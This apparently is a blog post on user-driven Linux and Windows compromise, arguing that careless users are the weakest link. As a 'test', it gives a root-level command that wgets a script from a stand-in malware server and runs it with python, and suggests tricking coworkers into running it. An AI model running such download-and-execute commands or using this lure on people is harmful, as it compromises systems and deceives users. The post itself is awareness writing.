How to write a linux virus

After reading an interesting article about linux “viruses” (the comments are interersing, too), I decided to raise the alarm about the source of many security related issues
in today’s computers: the user.
The author talks about the many ways to compromise a linux box, even if you are not root.
I will not get into techinal methods, you can find them on the internet or by reading the original article. Instead I will talk about the regular user.
From my experience I know for sure that a regular user could compromise his own system.
Don’t belive me? Make a little test.
1. For Windows
– rename any executable file as “virus.exe”, put it on a web server and give the link to your coworkers by email, instant messenger, whatever.
2. For Linux
– put them to open terminal and type “sudo su -” and then “wget http://www.your_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py”
You’ll be surprised by their actions. You’ll find out that many will open the link or run the commands.
For many of you this will not be a surprise. You’ll say: “I know someone who will instinctively click on the link!”.
Think about that every one of us knows a person like that.
It’s not a hard thing to make the user click on a link or run a command.
The attackers just have to find ways to extract informations from the compromised box.
In the end of the article, the author talks about solutions to this problem.

The easiest solution to prevent this kind of problem is to not just blindly click on attachments that people have sent you. Does that sound like a sentence you have always heard in the context of Windows before? You bet. The point is: Even on Linux this advice should be taken seriously.

In conclusion, there are no bullet-proof systems, only users who are too careless and click every link in their’s mouse way.

Leave a Comment


NOTE - You can use these HTML tags and attributes:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

This site uses Akismet to reduce spam. Learn how your comment data is processed.